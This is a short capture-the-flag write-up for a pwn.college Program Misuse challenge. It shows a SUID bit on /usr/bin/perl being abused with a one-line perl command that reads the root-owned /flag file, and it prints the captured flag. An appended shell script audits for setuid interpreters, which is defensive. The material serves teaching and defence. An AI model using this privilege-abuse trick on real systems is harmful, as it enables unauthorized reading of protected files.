Challenge Name: perl
Writeup from Program Misuse
Category: Program Misuse
Platform: pwn.college
Difficulty: Beginner
Date: 2025-07-16
Author: Himanshu Parate
Summary:
The challenge abuses a SUID bit set on /usr/bin/perl, allowing an unprivileged user to read the root-owned flag file at /flag.
Enumeration
ls -l /usr/bin/perl
Output:
-rwsr-xr-x 1 root root 47480 Sep 5 2019 /usr/bin/perl
- The s in -rws indicates it's a SUID binary. perl runs with root privileges.
Exploitation
The perl command runs Perl scripts. Perl is a powerful language used for text processing, scripting, and automation.
We can simply create a Perl-based file reader to read the contents of /flag.
perl -e 'open(F,"/flag"); print <F>; close F;'
Output:
pwn.college{YycVFpdHZT30LHkl6N9QDYFHWnk.dNDOxwSM0IzMyEzW}
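
The ls -l check from the Enumeration step, generalized into an audit that flags any setuid script interpreter under the directories it is given. This is an added example, not part of the original writeup; the interpreter name list and the function names are assumptions chosen for illustration.

```shell
#!/bin/sh
# Added example (not from the original writeup): flag setuid script interpreters.
# The name list below is an assumption for illustration; adjust it to your hosts.
INTERPRETERS='perl python ruby php lua node sh bash dash'

# is_interpreter NAME: succeed if NAME, minus a version suffix such as
# "5.30.0" in perl5.30.0 or "3.11" in python3.11, is in INTERPRETERS.
is_interpreter() {
    stem=$(printf '%s\n' "$1" | sed 's/[0-9.]*$//')
    for name in $INTERPRETERS; do
        if [ "$stem" = "$name" ]; then
            return 0
        fi
    done
    return 1
}

# audit_suid_interpreters DIR...: print "OWNER MODE PATH" for every regular
# file with the setuid bit whose name is an interpreter. Returns 1 on findings.
audit_suid_interpreters() {
    findings=$(
        find "$@" -xdev -type f -perm -4000 2>/dev/null |
        while IFS= read -r path; do
            if is_interpreter "$(basename "$path")"; then
                # ls -ld yields the mode string seen in the writeup (-rwsr-xr-x)
                ls -ld "$path" | awk -v p="$path" '{ print $3, $1, p }'
            fi
        done
    )
    if [ -n "$findings" ]; then
        printf '%s\n' "$findings"
        return 1
    fi
    return 0
}

# When run as a script with directory arguments, audit them.
if [ "$#" -gt 0 ]; then
    audit_suid_interpreters "$@"
fi
```

Removing the setuid bit with chmod u-s on a reported path clears the finding.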